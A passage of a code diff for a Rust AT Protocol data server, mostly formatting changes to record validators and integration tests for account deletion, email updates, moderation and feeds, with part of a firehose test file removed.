if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) { 119 121 if tags.len() > 8 { 120 122 return Err(ValidationError::InvalidField { ··· 123 125 }); 124 126 } 125 127 for (i, tag) in tags.iter().enumerate() { 126 - if let Some(tag_str) = tag.as_str() { 127 - if tag_str.len() > 640 { 128 + if let Some(tag_str) = tag.as_str() 129 + && tag_str.len() > 640 { 128 130 return Err(ValidationError::InvalidField { 129 131 path: format!("tags/{}", i), 130 132 message: "Tag exceeds maximum length of 640 bytes".to_string(), 131 133 }); 132 134 } 133 - } 134 135 } 135 136 } 136 137 Ok(()) 137 138 } 138 139 139 - fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 140 + fn validate_profile( 141 + &self, 142 + obj: &serde_json::Map<String, Value>, 143 + ) -> Result<(), ValidationError> { 140 144 if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) { 141 145 let grapheme_count = display_name.chars().count(); 142 146 if grapheme_count > 640 { 143 147 return Err(ValidationError::InvalidField { 144 148 path: "displayName".to_string(), 145 - message: format!("Display name exceeds maximum length of 640 characters (got {})", grapheme_count), 149 + message: format!( 150 + "Display name exceeds maximum length of 640 characters (got {})", 151 + grapheme_count 152 + ), 146 153 }); 147 154 } 148 155 } ··· 151 158 if grapheme_count > 2560 { 152 159 return Err(ValidationError::InvalidField { 153 160 path: "description".to_string(), 154 - message: format!("Description exceeds maximum length of 2560 characters (got {})", grapheme_count), 161 + message: format!( 162 + "Description exceeds maximum length of 2560 characters (got {})", 163 + grapheme_count 164 + ), 155 165 }); 156 166 } 157 167 } ··· 187 197 if !obj.contains_key("createdAt") { 188 198 return Err(ValidationError::MissingField("createdAt".to_string())); 189 199 } 190 - if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) { 191 - if !subject.starts_with("did:") { 200 + if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) 201 + && !subject.starts_with("did:") { 192 202 return Err(ValidationError::InvalidField { 193 203 path: "subject".to_string(), 194 204 message: "Subject must be a DID".to_string(), 195 205 }); 196 206 } 197 - } 198 207 Ok(()) 199 208 } 200 209 ··· 205 214 if !obj.contains_key("createdAt") { 206 215 return Err(ValidationError::MissingField("createdAt".to_string())); 207 216 } 208 - if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) { 209 - if !subject.starts_with("did:") { 217 + if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) 218 + && !subject.starts_with("did:") { 210 219 return Err(ValidationError::InvalidField { 211 220 path: "subject".to_string(), 212 221 message: "Subject must be a DID".to_string(), 213 222 }); 214 223 } 215 - } 216 224 Ok(()) 217 225 } 218 226 ··· 226 234 if !obj.contains_key("createdAt") { 227 235 return Err(ValidationError::MissingField("createdAt".to_string())); 228 236 } 229 - if let Some(name) = obj.get("name").and_then(|v| v.as_str()) { 230 - if name.is_empty() || name.len() > 64 { 237 + if let Some(name) = obj.get("name").and_then(|v| v.as_str()) 238 + && (name.is_empty() || name.len() > 64) { 231 239 return Err(ValidationError::InvalidField { 232 240 path: "name".to_string(), 233 241 message: "Name must be 1-64 characters".to_string(), 234 242 }); 235 243 } 236 - } 237 244 Ok(()) 238 245 } 239 246 240 - fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 247 + fn validate_list_item( 248 + &self, 249 + obj: &serde_json::Map<String, Value>, 250 + ) -> Result<(), ValidationError> { 241 251 if !obj.contains_key("subject") { 242 252 return Err(ValidationError::MissingField("subject".to_string())); 243 253 } ··· 250 260 Ok(()) 251 261 } 252 262 253 - fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 263 + fn validate_feed_generator( 264 + &self, 265 + obj: &serde_json::Map<String, Value>, 266 + ) -> Result<(), ValidationError> { 254 267 if !obj.contains_key("did") { 255 268 return Err(ValidationError::MissingField("did".to_string())); 256 269 } ··· 260 273 if !obj.contains_key("createdAt") { 261 274 return Err(ValidationError::MissingField("createdAt".to_string())); 262 275 } 263 - if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) { 264 - if display_name.is_empty() || display_name.len() > 240 { 276 + if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) 277 + && (display_name.is_empty() || display_name.len() > 240) { 265 278 return Err(ValidationError::InvalidField { 266 279 path: "displayName".to_string(), 267 280 message: "displayName must be 1-240 characters".to_string(), 268 281 }); 269 282 } 270 - } 271 283 Ok(()) 272 284 } 273 285 274 - fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 286 + fn validate_threadgate( 287 + &self, 288 + obj: &serde_json::Map<String, Value>, 289 + ) -> Result<(), ValidationError> { 275 290 if !obj.contains_key("post") { 276 291 return Err(ValidationError::MissingField("post".to_string())); 277 292 } ··· 281 296 Ok(()) 282 297 } 283 298 284 - fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 299 + fn validate_labeler_service( 300 + &self, 301 + obj: &serde_json::Map<String, Value>, 302 + ) -> Result<(), ValidationError> { 285 303 if !obj.contains_key("policies") { 286 304 return Err(ValidationError::MissingField("policies".to_string())); 287 305 } ··· 291 309 Ok(()) 292 310 } 293 311 294 - fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> { 295 - let obj = value 296 - .and_then(|v| v.as_object()) 297 - .ok_or_else(|| ValidationError::InvalidField { 298 - path: path.to_string(), 299 - message: "Must be a strong reference object".to_string(), 300 - })?; 312 + fn validate_strong_ref( 313 + &self, 314 + value: Option<&Value>, 315 + path: &str, 316 + ) -> Result<(), ValidationError> { 317 + let obj = 318 + value 319 + .and_then(|v| v.as_object()) 320 + .ok_or_else(|| ValidationError::InvalidField { 321 + path: path.to_string(), 322 + message: "Must be a strong reference object".to_string(), 323 + })?; 301 324 if !obj.contains_key("uri") { 302 325 return Err(ValidationError::MissingField(format!("{}/uri", path))); 303 326 } 304 327 if !obj.contains_key("cid") { 305 328 return Err(ValidationError::MissingField(format!("{}/cid", path))); 306 329 } 307 - if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) { 308 - if !uri.starts_with("at://") { 330 + if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) 331 + && !uri.starts_with("at://") { 309 332 return Err(ValidationError::InvalidField { 310 333 path: format!("{}/uri", path), 311 334 message: "URI must be an at:// URI".to_string(), 312 335 }); 313 336 } 314 - } 315 337 Ok(()) 316 338 } 317 339 } ··· 327 349 328 350 pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> { 329 351 if rkey.is_empty() { 330 - return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string())); 352 + return Err(ValidationError::InvalidRecord( 353 + "Record key cannot be empty".to_string(), 354 + )); 331 355 } 332 356 if rkey.len() > 512 { 333 - return Err(ValidationError::InvalidRecord("Record key exceeds maximum length of 512".to_string())); 357 + return Err(ValidationError::InvalidRecord( 358 + "Record key exceeds maximum length of 512".to_string(), 359 + )); 334 360 } 335 361 if rkey == "." || rkey == ".." { 336 - return Err(ValidationError::InvalidRecord("Record key cannot be '.' or '..'".to_string())); 362 + return Err(ValidationError::InvalidRecord( 363 + "Record key cannot be '.' or '..'".to_string(), 364 + )); 337 365 } 338 - let valid_chars = rkey.chars().all(|c| { 339 - c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_' || c == '~' 340 - }); 366 + let valid_chars = rkey 367 + .chars() 368 + .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_' || c == '~'); 341 369 if !valid_chars { 342 370 return Err(ValidationError::InvalidRecord( 343 - "Record key contains invalid characters (must be alphanumeric, '.', '-', '_', or '~')".to_string() 371 + "Record key contains invalid characters (must be alphanumeric, '.', '-', '_', or '~')" 372 + .to_string(), 344 373 )); 345 374 } 346 375 Ok(()) ··· 348 377 349 378 pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> { 350 379 if collection.is_empty() { 351 - return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string())); 380 + return Err(ValidationError::InvalidRecord( 381 + "Collection NSID cannot be empty".to_string(), 382 + )); 352 383 } 353 384 let parts: Vec<&str> = collection.split('.').collect(); 354 385 if parts.len() < 3 { 355 386 return Err(ValidationError::InvalidRecord( 356 - "Collection NSID must have at least 3 segments".to_string() 387 + "Collection NSID must have at least 3 segments".to_string(), 357 388 )); 358 389 } 359 390 for part in &parts { 360 391 if part.is_empty() { 361 392 return Err(ValidationError::InvalidRecord( 362 - "Collection NSID segments cannot be empty".to_string() 393 + "Collection NSID segments cannot be empty".to_string(), 363 394 )); 364 395 } 365 396 if !part.chars().all(|c| c.is_ascii_alphanumeric() || c == '-') { 366 397 return Err(ValidationError::InvalidRecord( 367 - "Collection NSID segments must be alphanumeric or hyphens".to_string() 398 + "Collection NSID segments must be alphanumeric or hyphens".to_string(), 368 399 )); 369 400 } 370 401 } ··· 385 416 "createdAt": "2024-01-01T00:00:00.000Z" 386 417 }); 387 418 assert_eq!( 388 - validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), 419 + validator 420 + .validate(&valid_post, "app.bsky.feed.post") 421 + .unwrap(), 389 422 ValidationStatus::Valid 390 423 ); 391 424 } ··· 397 430 "$type": "app.bsky.feed.post", 398 431 "createdAt": "2024-01-01T00:00:00.000Z" 399 432 }); 400 - assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err()); 433 + assert!( 434 + validator 435 + .validate(&invalid_post, "app.bsky.feed.post") 436 + .is_err() 437 + ); 401 438 } 402 439 403 440 #[test]
+1 -1
tests/actor.rs
··· 1 1 mod common; 2 2 use common::{base_url, client, create_account_and_login}; 3 - use serde_json::{json, Value}; 3 + use serde_json::{Value, json}; 4 4 5 5 #[tokio::test] 6 6 async fn test_get_preferences_empty() {
+6 -2
tests/admin_email.rs
··· 1 1 mod common; 2 2 3 3 use reqwest::StatusCode; 4 - use serde_json::{json, Value}; 4 + use serde_json::{Value, json}; 5 5 use sqlx::PgPool; 6 6 7 7 async fn get_pool() -> PgPool { ··· 46 46 .await 47 47 .expect("Notification not found"); 48 48 assert_eq!(notification.subject.as_deref(), Some("Test Admin Email")); 49 - assert!(notification.body.contains("Hello, this is a test email from the admin.")); 49 + assert!( 50 + notification 51 + .body 52 + .contains("Hello, this is a test email from the admin.") 53 + ); 50 54 } 51 55 52 56 #[tokio::test]
+6 -1
tests/admin_moderation.rs
··· 176 176 .await 177 177 .expect("Failed to send request"); 178 178 let status_body: Value = status_res.json().await.unwrap(); 179 - assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false)); 179 + assert!( 180 + status_body["takedown"].is_null() 181 + || !status_body["takedown"]["applied"] 182 + .as_bool() 183 + .unwrap_or(false) 184 + ); 180 185 } 181 186 182 187 #[tokio::test]
+6 -6
tests/appview_integration.rs
··· 2 2 3 3 use common::{base_url, client, create_account_and_login}; 4 4 use reqwest::StatusCode; 5 - use serde_json::{json, Value}; 5 + use serde_json::{Value, json}; 6 6 7 7 #[tokio::test] 8 8 async fn test_get_author_feed_returns_appview_data() { ··· 72 72 .unwrap(); 73 73 assert_eq!(res.status(), StatusCode::OK); 74 74 let body: Value = res.json().await.unwrap(); 75 - assert!(body["thread"].is_object(), "Response should have thread object"); 75 + assert!( 76 + body["thread"].is_object(), 77 + "Response should have thread object" 78 + ); 76 79 assert_eq!( 77 80 body["thread"]["$type"].as_str(), 78 81 Some("app.bsky.feed.defs#threadViewPost"), ··· 117 120 let base = base_url().await; 118 121 let (jwt, _did) = create_account_and_login(&client).await; 119 122 let res = client 120 - .post(format!( 121 - "{}/xrpc/app.bsky.notification.registerPush", 122 - base 123 - )) 123 + .post(format!("{}/xrpc/app.bsky.notification.registerPush", base)) 124 124 .header("Authorization", format!("Bearer {}", jwt)) 125 125 .json(&json!({ 126 126 "serviceDid": "did:web:example.com",
+44 -15
tests/common/mod.rs
··· 50 50 return; 51 51 } 52 52 if std::env::var("XDG_RUNTIME_DIR").is_ok() { 53 - let _ = std::process::Command::new("podman") 53 + let _ = std::process::Command::new("podman") 54 54 .args(&["rm", "-f", "--filter", "label=bspds_test=true"]) 55 55 .output(); 56 56 } 57 57 let _ = std::process::Command::new("docker") 58 - .args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"]) 58 + .args(&[ 59 + "container", 60 + "prune", 61 + "-f", 62 + "--filter", 63 + "label=bspds_test=true", 64 + ]) 59 65 .output(); 60 66 } 61 67 ··· 103 109 } 104 110 105 111 async fn setup_with_external_infra() -> String { 106 - let database_url = std::env::var("DATABASE_URL") 107 - .expect("DATABASE_URL must be set when using external infra"); 108 - let s3_endpoint = std::env::var("S3_ENDPOINT") 109 - .expect("S3_ENDPOINT must be set when using external infra"); 112 + let database_url = 113 + std::env::var("DATABASE_URL").expect("DATABASE_URL must be set when using external infra"); 114 + let s3_endpoint = 115 + std::env::var("S3_ENDPOINT").expect("S3_ENDPOINT must be set when using external infra"); 110 116 unsafe { 111 - std::env::set_var("S3_BUCKET", std::env::var("S3_BUCKET").unwrap_or_else(|_| "test-bucket".to_string())); 112 - std::env::set_var("AWS_ACCESS_KEY_ID", std::env::var("AWS_ACCESS_KEY_ID").unwrap_or_else(|_| "minioadmin".to_string())); 113 - std::env::set_var("AWS_SECRET_ACCESS_KEY", std::env::var("AWS_SECRET_ACCESS_KEY").unwrap_or_else(|_| "minioadmin".to_string())); 114 - std::env::set_var("AWS_REGION", std::env::var("AWS_REGION").unwrap_or_else(|_| "us-east-1".to_string())); 117 + std::env::set_var( 118 + "S3_BUCKET", 119 + std::env::var("S3_BUCKET").unwrap_or_else(|_| "test-bucket".to_string()), 120 + ); 121 + std::env::set_var( 122 + "AWS_ACCESS_KEY_ID", 123 + std::env::var("AWS_ACCESS_KEY_ID").unwrap_or_else(|_| "minioadmin".to_string()), 124 + ); 125 + std::env::set_var( 126 + "AWS_SECRET_ACCESS_KEY", 127 + std::env::var("AWS_SECRET_ACCESS_KEY").unwrap_or_else(|_| "minioadmin".to_string()), 128 + ); 129 + std::env::set_var( 130 + "AWS_REGION", 131 + std::env::var("AWS_REGION").unwrap_or_else(|_| "us-east-1".to_string()), 132 + ); 115 133 std::env::set_var("S3_ENDPOINT", &s3_endpoint); 116 134 } 117 135 let mock_server = MockServer::start().await; ··· 189 207 190 208 #[cfg(feature = "external-infra")] 191 209 async fn setup_with_testcontainers() -> String { 192 - panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT."); 210 + panic!( 211 + "Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT." 212 + ); 193 213 } 194 214 195 215 async fn setup_mock_appview(mock_server: &MockServer) { ··· 218 238 .set_body_json(json!({ 219 239 "feed": [], 220 240 "cursor": null 221 - })) 241 + })), 222 242 ) 223 243 .mount(mock_server) 224 244 .await; ··· 364 384 #[cfg(not(feature = "external-infra"))] 365 385 { 366 386 let container = DB_CONTAINER.get().expect("DB container not initialized"); 367 - let port = container.get_host_port_ipv4(5432).await.expect("Failed to get port"); 387 + let port = container 388 + .get_host_port_ipv4(5432) 389 + .await 390 + .expect("Failed to get port"); 368 391 format!("postgres://postgres:postgres@127.0.0.1:{}/postgres", port) 369 392 } 370 393 #[cfg(feature = "external-infra")] ··· 404 427 .await 405 428 .expect("confirmSignup request failed"); 406 429 assert_eq!(confirm_res.status(), StatusCode::OK, "confirmSignup failed"); 407 - let confirm_body: Value = confirm_res.json().await.expect("Invalid JSON from confirmSignup"); 430 + let confirm_body: Value = confirm_res 431 + .json() 432 + .await 433 + .expect("Invalid JSON from confirmSignup"); 408 434 confirm_body["accessJwt"] 409 435 .as_str() 410 436 .expect("No accessJwt in confirmSignup response") ··· 543 569 .await 544 570 .expect("confirmSignup request failed"); 545 571 if confirm_res.status() == StatusCode::OK { 546 - let confirm_body: Value = confirm_res.json().await.expect("Invalid JSON from confirmSignup"); 572 + let confirm_body: Value = confirm_res 573 + .json() 574 + .await 575 + .expect("Invalid JSON from confirmSignup"); 547 576 let access_jwt = confirm_body["accessJwt"] 548 577 .as_str() 549 578 .expect("No accessJwt in confirmSignup response")
+52 -29
tests/delete_account.rs
··· 1 1 mod common; 2 2 mod helpers; 3 - use common::*; 4 3 use chrono::Utc; 4 + use common::*; 5 5 use reqwest::StatusCode; 6 6 use serde_json::{Value, json}; 7 7 use sqlx::PgPool; ··· 15 15 .expect("Failed to connect to test database") 16 16 } 17 17 18 - async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) { 18 + async fn create_verified_account( 19 + client: &reqwest::Client, 20 + base_url: &str, 21 + handle: &str, 22 + email: &str, 23 + password: &str, 24 + ) -> (String, String) { 19 25 let res = client 20 - .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) 26 + .post(format!( 27 + "{}/xrpc/com.atproto.server.createAccount", 28 + base_url 29 + )) 21 30 .json(&json!({ 22 31 "handle": handle, 23 32 "email": email, ··· 53 62 .expect("Failed to request account deletion"); 54 63 assert_eq!(request_delete_res.status(), StatusCode::OK); 55 64 let pool = get_pool().await; 56 - let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did) 57 - .fetch_one(&pool) 58 - .await 59 - .expect("Failed to query deletion token"); 65 + let row = sqlx::query!( 66 + "SELECT token FROM account_deletion_requests WHERE did = $1", 67 + did 68 + ) 69 + .fetch_one(&pool) 70 + .await 71 + .expect("Failed to query deletion token"); 60 72 let token = row.token; 61 73 let delete_payload = json!({ 62 74 "did": did, ··· 79 91 .expect("Failed to query user"); 80 92 assert!(user_row.is_none(), "User should be deleted from database"); 81 93 let session_res = client 82 - .get(format!( 83 - "{}/xrpc/com.atproto.server.getSession", 84 - base_url 85 - )) 94 + .get(format!("{}/xrpc/com.atproto.server.getSession", base_url)) 86 95 .bearer_auth(&jwt) 87 96 .send() 88 97 .await ··· 110 119 .expect("Failed to request account deletion"); 111 120 assert_eq!(request_delete_res.status(), StatusCode::OK); 112 121 let pool = get_pool().await; 113 - let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did) 114 - .fetch_one(&pool) 115 - .await 116 - .expect("Failed to query deletion token"); 122 + let row = sqlx::query!( 123 + "SELECT token FROM account_deletion_requests WHERE did = $1", 124 + did 125 + ) 126 + .fetch_one(&pool) 127 + .await 128 + .expect("Failed to query deletion token"); 117 129 let token = row.token; 118 130 let delete_payload = json!({ 119 131 "did": did, ··· 197 209 .expect("Failed to request account deletion"); 198 210 assert_eq!(request_delete_res.status(), StatusCode::OK); 199 211 let pool = get_pool().await; 200 - let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did) 201 - .fetch_one(&pool) 202 - .await 203 - .expect("Failed to query deletion token"); 212 + let row = sqlx::query!( 213 + "SELECT token FROM account_deletion_requests WHERE did = $1", 214 + did 215 + ) 216 + .fetch_one(&pool) 217 + .await 218 + .expect("Failed to query deletion token"); 204 219 let token = row.token; 205 220 sqlx::query!( 206 221 "UPDATE account_deletion_requests SET expires_at = NOW() - INTERVAL '1 hour' WHERE token = $1", ··· 236 251 let handle1 = format!("delete-user1-{}.test", ts); 237 252 let email1 = format!("delete-user1-{}@test.com", ts); 238 253 let password1 = "user1-password"; 239 - let (did1, jwt1) = create_verified_account(&client, &base_url, &handle1, &email1, password1).await; 254 + let (did1, jwt1) = 255 + create_verified_account(&client, &base_url, &handle1, &email1, password1).await; 240 256 let handle2 = format!("delete-user2-{}.test", ts); 241 257 let email2 = format!("delete-user2-{}@test.com", ts); 242 258 let password2 = "user2-password"; ··· 252 268 .expect("Failed to request account deletion"); 253 269 assert_eq!(request_delete_res.status(), StatusCode::OK); 254 270 let pool = get_pool().await; 255 - let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did1) 256 - .fetch_one(&pool) 257 - .await 258 - .expect("Failed to query deletion token"); 271 + let row = sqlx::query!( 272 + "SELECT token FROM account_deletion_requests WHERE did = $1", 273 + did1 274 + ) 275 + .fetch_one(&pool) 276 + .await 277 + .expect("Failed to query deletion token"); 259 278 let token = row.token; 260 279 let delete_payload = json!({ 261 280 "did": did2, ··· 284 303 let handle = format!("delete-apppw-{}.test", ts); 285 304 let email = format!("delete-apppw-{}@test.com", ts); 286 305 let main_password = "main-password-123"; 287 - let (did, jwt) = create_verified_account(&client, &base_url, &handle, &email, main_password).await; 306 + let (did, jwt) = 307 + create_verified_account(&client, &base_url, &handle, &email, main_password).await; 288 308 let app_password_res = client 289 309 .post(format!( 290 310 "{}/xrpc/com.atproto.server.createAppPassword", ··· 309 329 .expect("Failed to request account deletion"); 310 330 assert_eq!(request_delete_res.status(), StatusCode::OK); 311 331 let pool = get_pool().await; 312 - let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did) 313 - .fetch_one(&pool) 314 - .await 315 - .expect("Failed to query deletion token"); 332 + let row = sqlx::query!( 333 + "SELECT token FROM account_deletion_requests WHERE did = $1", 334 + did 335 + ) 336 + .fetch_one(&pool) 337 + .await 338 + .expect("Failed to query deletion token"); 316 339 let token = row.token; 317 340 let delete_payload = json!({ 318 341 "did": did,
+66 -21
tests/email_update.rs
··· 1 1 mod common; 2 2 use reqwest::StatusCode; 3 - use serde_json::{json, Value}; 3 + use serde_json::{Value, json}; 4 4 use sqlx::PgPool; 5 5 6 6 async fn get_pool() -> PgPool { ··· 12 12 .expect("Failed to connect to test database") 13 13 } 14 14 15 - async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String { 15 + async fn create_verified_account( 16 + client: &reqwest::Client, 17 + base_url: &str, 18 + handle: &str, 19 + email: &str, 20 + ) -> String { 16 21 let res = client 17 - .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) 22 + .post(format!( 23 + "{}/xrpc/com.atproto.server.createAccount", 24 + base_url 25 + )) 18 26 .json(&json!({ 19 27 "handle": handle, 20 28 "email": email, ··· 39 47 let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await; 40 48 let new_email = format!("new_{}@example.com", handle); 41 49 let res = client 42 - .post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url)) 50 + .post(format!( 51 + "{}/xrpc/com.atproto.server.requestEmailUpdate", 52 + base_url 53 + )) 43 54 .bearer_auth(&access_jwt) 44 55 .json(&json!({"email": new_email})) 45 56 .send() ··· 55 66 .fetch_one(&pool) 56 67 .await 57 68 .expect("User not found"); 58 - assert_eq!(user.email_pending_verification.as_deref(), Some(new_email.as_str())); 69 + assert_eq!( 70 + user.email_pending_verification.as_deref(), 71 + Some(new_email.as_str()) 72 + ); 59 73 assert!(user.email_confirmation_code.is_some()); 60 74 let code = user.email_confirmation_code.unwrap(); 61 75 let res = client ··· 92 106 let email2 = format!("{}@example.com", handle2); 93 107 let access_jwt2 = create_verified_account(&client, &base_url, &handle2, &email2).await; 94 108 let res = client 95 - .post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url)) 109 + .post(format!( 110 + "{}/xrpc/com.atproto.server.requestEmailUpdate", 111 + base_url 112 + )) 96 113 .bearer_auth(&access_jwt2) 97 114 .json(&json!({"email": email1})) 98 115 .send() ··· 112 129 let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await; 113 130 let new_email = format!("new_{}@example.com", handle); 114 131 let res = client 115 - .post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url)) 132 + .post(format!( 133 + "{}/xrpc/com.atproto.server.requestEmailUpdate", 134 + base_url 135 + )) 116 136 .bearer_auth(&access_jwt) 117 137 .json(&json!({"email": new_email})) 118 138 .send() ··· 144 164 let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await; 145 165 let new_email = format!("new_{}@example.com", handle); 146 166 let res = client 147 - .post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url)) 167 + .post(format!( 168 + "{}/xrpc/com.atproto.server.requestEmailUpdate", 169 + base_url 170 + )) 148 171 .bearer_auth(&access_jwt) 149 172 .json(&json!({"email": new_email})) 150 173 .send() 151 174 .await 152 175 .expect("Failed to request email update"); 153 176 assert_eq!(res.status(), StatusCode::OK); 154 - let user = sqlx::query!("SELECT email_confirmation_code FROM users WHERE handle = $1", handle) 155 - .fetch_one(&pool) 156 - .await 157 - .expect("User not found"); 177 + let user = sqlx::query!( 178 + "SELECT email_confirmation_code FROM users WHERE handle = $1", 179 + handle 180 + ) 181 + .fetch_one(&pool) 182 + .await 183 + .expect("User not found"); 158 184 let code = user.email_confirmation_code.unwrap(); 159 185 let res = client 160 186 .post(format!("{}/xrpc/com.atproto.server.confirmEmail", base_url)) ··· 209 235 .send() 210 236 .await 211 237 .expect("Failed to update email"); 212 - assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op"); 238 + assert_eq!( 239 + res.status(), 240 + StatusCode::OK, 241 + "Updating to same email should succeed as no-op" 242 + ); 213 243 } 214 244 215 245 #[tokio::test] ··· 221 251 let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await; 222 252 let new_email = format!("pending_{}@example.com", handle); 223 253 let res = client 224 - .post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url)) 254 + .post(format!( 255 + "{}/xrpc/com.atproto.server.requestEmailUpdate", 256 + base_url 257 + )) 225 258 .bearer_auth(&access_jwt) 226 259 .json(&json!({"email": new_email})) 227 260 .send() ··· 250 283 let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await; 251 284 let new_email = format!("valid_{}@example.com", handle); 252 285 let res = client 253 - .post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url)) 286 + .post(format!( 287 + "{}/xrpc/com.atproto.server.requestEmailUpdate", 288 + base_url 289 + )) 254 290 .bearer_auth(&access_jwt) 255 291 .json(&json!({"email": new_email})) 256 292 .send() ··· 276 312 .await 277 313 .expect("Failed to update email"); 278 314 assert_eq!(res.status(), StatusCode::OK); 279 - let user = sqlx::query!("SELECT email, email_pending_verification FROM users WHERE handle = $1", handle) 280 - .fetch_one(&pool) 281 - .await 282 - .expect("User not found"); 315 + let user = sqlx::query!( 316 + "SELECT email, email_pending_verification FROM users WHERE handle = $1", 317 + handle 318 + ) 319 + .fetch_one(&pool) 320 + .await 321 + .expect("User not found"); 283 322 assert_eq!(user.email, Some(new_email)); 284 323 assert!(user.email_pending_verification.is_none()); 285 324 } ··· 293 332 let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await; 294 333 let new_email = format!("badtok_{}@example.com", handle); 295 334 let res = client 296 - .post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url)) 335 + .post(format!( 336 + "{}/xrpc/com.atproto.server.requestEmailUpdate", 337 + base_url 338 + )) 297 339 .bearer_auth(&access_jwt) 298 340 .json(&json!({"email": new_email})) 299 341 .send() ··· 334 376 .expect("Failed to attempt email update"); 335 377 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 336 378 let body: Value = res.json().await.expect("Invalid JSON"); 337 - assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest"); 379 + assert!( 380 + body["message"].as_str().unwrap().contains("already in use") 381 + || body["error"] == "InvalidRequest" 382 + ); 338 383 } 339 384 340 385 #[tokio::test]
+1 -4
tests/feed.rs
··· 90 90 let client = client(); 91 91 let base = base_url().await; 92 92 let res = client 93 - .post(format!( 94 - "{}/xrpc/app.bsky.notification.registerPush", 95 - base 96 - )) 93 + .post(format!("{}/xrpc/app.bsky.notification.registerPush", base)) 97 94 .json(&json!({ 98 95 "serviceDid": "did:web:example.com", 99 96 "token": "test-token",
-192
tests/firehose.rs
··· 1 - mod common; 2 - use common::*; 3 - use cid::Cid; 4 - use futures::{stream::StreamExt, SinkExt}; 5 - use iroh_car::CarReader; 6 - use reqwest::StatusCode; 7 - use serde::Deserialize; 8 - use serde_json::{json, Value}; 9 - use std::io::Cursor; 10 - use tokio_tungstenite::{connect_async, tungstenite}; 11 - 12 - #[derive(Debug, Deserialize)] 13 - struct FrameHeader { 14 - op: i64, 15 - t: String, 16 - } 17 - 18 - #[derive(Debug, Deserialize)] 19 - struct CommitFrame { 20 - seq: i64, 21 - rebase: bool, 22 - #[serde(rename = "tooBig")] 23 - too_big: bool, 24 - repo: String, 25 - commit: Cid, 26 - rev: String, 27 - since: Option<String>, 28 - #[serde(with = "serde_bytes")] 29 - blocks: Vec<u8>, 30 - ops: Vec<RepoOp>, 31 - blobs: Vec<Cid>, 32 - time: String, 33 - } 34 - 35 - #[derive(Debug, Deserialize)] 36 - struct RepoOp { 37 - action: String, 38 - path: String, 39 - cid: Option<Cid>, 40 - } 41 - 42 - fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> { 43 - let mut pos = 0; 44 - fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> { 45 - match additional { 46 - 0..=23 => Ok(additional as u64), 47 - 24 => { 48 - if *pos >= bytes.len() { return Err("Unexpected end".into()); } 49 - let val = bytes[*pos] as u64; 50 - *pos += 1; 51 - Ok(val) 52 - } 53 - 25 => { 54 - if *pos + 2 > bytes.len() { return Err("Unexpected end".into()); } 55 - let val = u16::from_be_bytes([bytes[*pos], bytes[*pos + 1]]) as u64; 56 - *pos += 2; 57 - Ok(val) 58 - } 59 - 26 => { 60 - if *pos + 4 > bytes.len() { return Err("Unexpected end".into()); } 61 - let val = u32::from_be_bytes([bytes[*pos], bytes[*pos + 1], bytes[*pos + 2], bytes[*pos + 3]]) as u64; 62 - *pos += 4; 63 - Ok(val) 64 - } 65 - 27 => { 66 - if *pos + 8 > bytes.len() { return Err("Unexpected end".into()); } 67 - let val = u64::from_be_bytes([bytes[*pos], bytes[*pos + 1], bytes[*pos + 2], bytes[*pos + 